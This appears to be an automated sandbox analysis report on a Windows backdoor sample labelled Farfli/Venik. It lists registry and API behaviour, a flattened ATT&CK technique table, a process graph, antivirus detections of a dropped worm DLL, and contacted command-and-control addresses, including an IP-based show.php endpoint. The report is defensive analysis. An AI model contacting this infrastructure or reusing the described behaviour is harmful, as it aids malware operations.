Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\XgijTrY6No.exeCode function: 0_2_0040229F _EH_prolog,EnterCriticalSection,#540,SendMessageA,#3998,#6907,#6907,#2818,#6907,GetSystemTime,#2818,#6907,#6007,#823,#823,memcpy,#6007,LeaveCriticalSection,#800,0_2_0040229F
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_10006C40 Sleep,GetVersionExA,CreateThread,sprintf,6_2_10006C40

Stealing of Sensitive Information

barindex
Queries disk data (e.g. SMART data)
Source: C:\Windows\SysWOW64\rundll32.exeDevice IO: \Device\Harddisk0\DR0Jump to behavior
Source: C:\Users\user\Desktop\XgijTrY6No.exeCode function: 0_2_0040271C socket,gethostname,gethostbyname,htons,memcpy,bind,setsockopt,setsockopt,setsockopt,WSAIoctl,WSAGetLastError,CreateThread,closesocket,0_2_0040271C
Source: C:\Users\user\AppData\Local\Temp\mszcy.exeCode function: 5_2_0040271C socket,gethostname,gethostbyname,htons,memcpy,bind,setsockopt,LdrInitializeThunk,LdrInitializeThunk,setsockopt,LdrInitializeThunk,setsockopt,LdrInitializeThunk,WSAIoctl,WSAGetLastError,CreateThread,closesocket,5_2_0040271C
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_100055E0 WSAStartup,socket,socket,socket,htons,htons,inet_addr,inet_addr,htons,inet_addr,bind,ioctlsocket,select,Sleep,wsprintfA,malloc,htons,htons,htons,htons,htons,htons,htons,inet_addr,closesocket,closesocket,closesocket,6_2_100055E0

Mitre Att&ck Matrix

ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity InformationAcquire InfrastructureValid Accounts11
Native API		1
DLL Side-Loading		1
DLL Side-Loading		1
Deobfuscate/Decode Files or Information		OS Credential Dumping1
System Time Discovery		Remote Services1
Archive Collected Data		2
Ingress Tool Transfer		Exfiltration Over Other Network Medium1
System Shutdown/Reboot
CredentialsDomainsDefault AccountsScheduled Task/Job11
Registry Run Keys / Startup Folder		1
Access Token Manipulation		3
Obfuscated Files or Information		LSASS Memory2
File and Directory Discovery		Remote Desktop ProtocolData from Removable Media11
Encrypted Channel		Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain AccountsAt1
Bootkit		111
Process Injection		2
Software Packing		Security Account Manager124
System Information Discovery		SMB/Windows Admin SharesData from Network Shared Drive11
Non-Standard Port		Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook11
Registry Run Keys / Startup Folder		1
DLL Side-Loading		NTDS11
Security Software Discovery		Distributed Component Object ModelInput Capture2
Non-Application Layer Protocol		Traffic DuplicationData Destruction
Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
File Deletion		LSA Secrets21
Virtualization/Sandbox Evasion		SSHKeylogging13
Application Layer Protocol		Scheduled TransferData Encrypted for Impact
Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts21
Virtualization/Sandbox Evasion		Cached Domain Credentials1
Process Discovery		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
Access Token Manipulation		DCSync11
Application Window Discovery		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job111
Process Injection		Proc Filesystem1
Remote System Discovery		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt1
Bootkit		/etc/passwd and /etc/shadow1
System Network Configuration Discovery		Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron1
Rundll32		Network SniffingNetwork Service DiscoveryShared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement

Behavior Graph

Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1573195 Sample: XgijTrY6No.exe Startdate: 11/12/2024 Architecture: WINDOWS Score: 100 48 krnaver.com 2->48 50 blogx.sina.com.cn 2->50 52 blog.sina.com.cn 2->52 66 Antivirus detection for dropped file 2->66 68 Antivirus / Scanner detection for submitted sample 2->68 70 Multi AV Scanner detection for dropped file 2->70 72 7 other signatures 2->72 9 XgijTrY6No.exe 1 2->9         started        12 rundll32.exe 2->12         started        14 rundll32.exe 2->14         started        signatures3 process4 file5 46 C:\Users\user\AppData\Local\Temp\mszcy.exe, PE32 9->46 dropped 16 cmd.exe 1 9->16         started        19 cmd.exe 1 12->19         started        21 cmd.exe 14->21         started        process6 signatures7 62 Uses ping.exe to sleep 16->62 64 Uses ping.exe to check the status of other devices and networks 16->64 23 mszcy.exe 2 16->23         started        27 PING.EXE 1 16->27         started        30 conhost.exe 16->30         started        32 conhost.exe 19->32         started        34 PING.EXE 1 19->34         started        36 conhost.exe 21->36         started        38 PING.EXE 1 21->38         started        process8 dnsIp9 44 C:\ftelcs\rjqzr.dll, PE32 23->44 dropped 74 Antivirus detection for dropped file 23->74 76 Machine Learning detection for dropped file 23->76 78 Deletes itself after installation 23->78 40 rundll32.exe 1 14 23->40         started        60 127.0.0.1 unknown unknown 27->60 file10 signatures11 process12 dnsIp13 54 krnaver.com 40->54 56 107.163.241.204, 12354, 49227, 49286 TAKE2US United States 40->56 58 blogx.sina.com.cn 202.108.0.52, 443, 49288, 49463 CHINA169-BJChinaUnicomBeijingProvinceNetworkCN China 40->58 80 System process connects to network (likely due to code injection or exploit) 40->80 82 Found evasive API chain (may stop execution after checking mutex) 40->82 84 Contains functionality to infect the boot sector 40->84 86 2 other signatures 40->86 signatures14

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

SourceDetectionScannerLabelLink
XgijTrY6No.exe89%ReversingLabsWin32.Backdoor.Venik
XgijTrY6No.exe100%AviraTR/Farfli.ltgad
XgijTrY6No.exe100%Joe Sandbox ML

Dropped Files

SourceDetectionScannerLabelLink
C:\ftelcs\rjqzr.dll100%AviraTR/Patched.Ren.Gen
C:\Users\user\AppData\Local\Temp\mszcy.exe100%AviraTR/Farfli.ltgad
C:\ftelcs\rjqzr.dll100%Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\mszcy.exe100%Joe Sandbox ML
C:\ftelcs\rjqzr.dll68%ReversingLabsWin32.Worm.Palevo

Unpacked PE Files

No Antivirus matches

Domains

No Antivirus matches

URLs

SourceDetectionScannerLabelLink
http://107.163.241.204:12354/show.php:0%Avira URL Cloudsafe
http://107.163.241.204:12354/show.phpI0%Avira URL Cloudsafe
http://107.163.241.204:12354/show.phpv0%Avira URL Cloudsafe
http://107.163.241.204:12354/show.phpu0%Avira URL Cloudsafe
http://107.163.241.204:12354/show.phpA0%Avira URL Cloudsafe
http://107.163.241.204:12354/show.phpB0%Avira URL Cloudsafe
http://107.163.241.204:12354/show.php?0%Avira URL Cloudsafe
http://107.163.241.204:12354/show.phpE0%Avira URL Cloudsafe
http://107.163.241.204:12354/show.php.T60%Avira URL Cloudsafe
http://107.163.241.204:12354/show.php0%Avira URL Cloudsafe
http://107.163.241.204:12354/show.phpFT0%Avira URL Cloudsafe
http://107.163.241.204:12354/show.phpT0%Avira URL Cloudsafe
http://107.163.241.204:12354/show.phpzTb0%Avira URL Cloudsafe
http://107.163.241.204:12354/show.phplTp0%Avira URL Cloudsafe
http://107.163.241.204:12354/show.phpbTz0%Avira URL Cloudsafe
http://107.163.241.204:12354/show.phph0%Avira URL Cloudsafe
http://107.163.24I0%Avira URL Cloudsafe
http://107.163.241.204:12354/show.phpW0%Avira URL Cloudsafe
http://107.163.241.204:12354/show.phpZ0%Avira URL Cloudsafe
http://107.163.241.204:12354/show.php(0%Avira URL Cloudsafe
http://107.163.241.204:12354/show.php#0%Avira URL Cloudsafe
http://107.163.241.204:12354/show.phpc0%Avira URL Cloudsafe
http://107.163.241.204:12354/show.php%0%Avira URL Cloudsafe
http://107.163.241.204:12354/show.php)0%Avira URL Cloudsafe
http://107.163.241.204:12354/show.phpg0%Avira URL Cloudsafe

Domains and IPs

Contacted Domains

NameIPActiveMaliciousAntivirus DetectionReputation
s-part-0035.t-0009.t-msedge.net
13.107.246.63
truefalse
    		high
    blogx.sina.com.cn
    		202.108.0.52
    		truefalse
      		high
      krnaver.com
      		unknown
      		unknowntrue
        		unknown
        blog.sina.com.cn
        		unknown
        		unknownfalse
          		high

          Contacted URLs

          NameMaliciousAntivirus DetectionReputation
          http://107.163.241.204:12354/show.phptrue
          • Avira URL Cloud: safe
          		unknown
          https://blog.sina.com.cn/u/5655029807false
            		high

            URLs from Memory and Binaries

            NameSourceMaliciousAntivirus DetectionReputation
            http://107.163.241.204:12354/show.php:rundll32.exe, 00000006.00000003.3597257344.0000000000D23000.00000004.00000020.00020000.00000000.sdmpfalse
            • Avira URL Cloud: safe
            		unknown
            http://107.163.241.204:12354/show.php?rundll32.exe, 00000006.00000003.2221907978.0000000000D25000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.1813762319.0000000000D25000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000002.3803023615.0000000000D0C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.2422920583.0000000000D25000.00000004.00000020.00020000.00000000.sdmpfalse
            • Avira URL Cloud: safe
            		unknown
            http://107.163.241.204:12354/show.phpurundll32.exe, 00000006.00000003.3031858000.0000000000D25000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.2262348463.0000000000D23000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.3031593454.0000000000D0C000.00000004.00000020.00020000.00000000.sdmpfalse
            • Avira URL Cloud: safe
            		unknown
            http://107.163.241.204:12354/show.phpvrundll32.exe, 00000006.00000003.1693230405.0000000000D2A000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.3031858000.0000000000D25000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.1653072832.0000000000D0C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.3515855541.0000000000D0C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.2262348463.0000000000D23000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.2221907978.0000000000D25000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.3597257344.0000000000D23000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.3031593454.0000000000D0C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000002.3803023615.0000000000D0C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.2422920583.0000000000D25000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.3758155005.0000000000D23000.00000004.00000020.00020000.00000000.sdmpfalse
            • Avira URL Cloud: safe
            		unknown
            http://107.163.241.204:12354/show.phpIrundll32.exe, 00000006.00000002.3811115013.0000000005B20000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.3515855541.0000000000D0C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.3758155005.0000000000D23000.00000004.00000020.00020000.00000000.sdmpfalse
            • Avira URL Cloud: safe
            		unknown
            http://blog.sina.com.cn/u/5655029807.rundll32.exe, 00000006.00000003.1813762319.0000000000D25000.00000004.00000020.00020000.00000000.sdmpfalse
              		high
              http://blog.sina.com.cn/u/5655029807z:rundll32.exe, 00000006.00000003.3031858000.0000000000D25000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.3031593454.0000000000D0C000.00000004.00000020.00020000.00000000.sdmpfalse
                		high
                http://blog.sina.com.cn/u/%srundll32.exe, rundll32.exe, 00000006.00000002.3817571933.0000000010001000.00000040.00000001.01000000.00000005.sdmpfalse
                  		high
                  http://107.163.241.204:12354/show.php.T6rundll32.exe, 00000006.00000002.3803023615.0000000000CCA000.00000004.00000020.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  http://blog.sina.com.cn/u/5655029807XTrundll32.exe, 00000006.00000002.3803023615.0000000000CCA000.00000004.00000020.00020000.00000000.sdmpfalse
                    		high
                    http://blog.sina.com.cn/u/5655029807hrundll32.exe, 00000006.00000002.3803023615.0000000000C6E000.00000004.00000020.00020000.00000000.sdmpfalse
                      		high
                      http://blog.sina.com.cn/u/5655029807ntsrundll32.exe, 00000006.00000002.3811115013.0000000005B20000.00000004.00000020.00020000.00000000.sdmpfalse
                        		high
                        http://107.163.241.204:12354/show.phpArundll32.exe, 00000006.00000003.3031858000.0000000000D25000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.2221907978.0000000000D25000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.3031593454.0000000000D0C000.00000004.00000020.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        http://blog.sina.com.cn/u/5655029807pDatarundll32.exe, 00000006.00000002.3811115013.0000000005B20000.00000004.00000020.00020000.00000000.sdmpfalse
                          		high
                          http://107.163.241.204:12354/show.phpBrundll32.exe, 00000006.00000002.3803023615.0000000000D0C000.00000004.00000020.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          http://107.163.241.204:12354/show.phpErundll32.exe, 00000006.00000002.3811115013.0000000005B20000.00000004.00000020.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          http://107.163.241.204:12354/show.phplTprundll32.exe, 00000006.00000002.3803023615.0000000000CCA000.00000004.00000020.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          http://107.163.241.204:12354/show.phpzTbrundll32.exe, 00000006.00000002.3803023615.0000000000CCA000.00000004.00000020.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          http://107.163.241.204:12354/show.phpZrundll32.exe, 00000006.00000002.3803023615.0000000000CCA000.00000004.00000020.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          https://blog.sina.com.cn/crosoftrundll32.exe, 00000006.00000003.1693170909.0000000000D46000.00000004.00000020.00020000.00000000.sdmpfalse
                            		high
                            http://blog.sina.com.cn/u/56550298079rundll32.exe, 00000006.00000003.3031593454.0000000000D0C000.00000004.00000020.00020000.00000000.sdmpfalse
                              		high
                              http://blog.sina.com.cn/u/5655029807:rundll32.exe, 00000006.00000003.1693230405.0000000000D2A000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.1653072832.0000000000D0C000.00000004.00000020.00020000.00000000.sdmpfalse
                                		high
                                http://blog.sina.com.cn/u/5655029807zrundll32.exe, 00000006.00000002.3811115013.0000000005B20000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.2262348463.0000000000D23000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.2221907978.0000000000D25000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.3597257344.0000000000D23000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000002.3803023615.0000000000C5A000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.3758155005.0000000000D23000.00000004.00000020.00020000.00000000.sdmpfalse
                                  		high
                                  http://blog.sina.com.cn/u/5655029807z%rundll32.exe, 00000006.00000003.1813762319.0000000000D25000.00000004.00000020.00020000.00000000.sdmpfalse
                                    		high
                                    http://107.163.241.204:12354/show.phpFTrundll32.exe, 00000006.00000002.3803023615.0000000000CCA000.00000004.00000020.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    		unknown
                                    https://blog.sina.com.cn/u/5655029807Datarundll32.exe, 00000006.00000003.2422808877.0000000005BA4000.00000004.00000020.00020000.00000000.sdmpfalse
                                      		high
                                      http://blog.sina.com.cn/u/5655029807vrundll32.exe, 00000006.00000003.1813762319.0000000000D25000.00000004.00000020.00020000.00000000.sdmpfalse
                                        		high
                                        http://107.163.241.204:12354/show.phpTrundll32.exe, 00000006.00000003.3031858000.0000000000D25000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.3597257344.0000000000D23000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.3031593454.0000000000D0C000.00000004.00000020.00020000.00000000.sdmpfalse
                                        • Avira URL Cloud: safe
                                        		unknown
                                        https://blog.sina.com.cn/u/5655029807(rundll32.exe, 00000006.00000003.2262348463.0000000000D23000.00000004.00000020.00020000.00000000.sdmpfalse
                                          		high
                                          http://107.163.241.204:12354/show.phpWrundll32.exe, 00000006.00000002.3803023615.0000000000CCA000.00000004.00000020.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          http://107.163.241.204:12354/show.phpbTzrundll32.exe, 00000006.00000002.3803023615.0000000000CCA000.00000004.00000020.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          http://blog.sina.com.cn/u/%sXGRyaXZlcnNcZXRjXGhvc3RzLmljcw==XGRyaXZlcnNcZXRjXGhvc3Rzrundll32.exe, 00000006.00000002.3817571933.0000000010001000.00000040.00000001.01000000.00000005.sdmpfalse
                                            		high
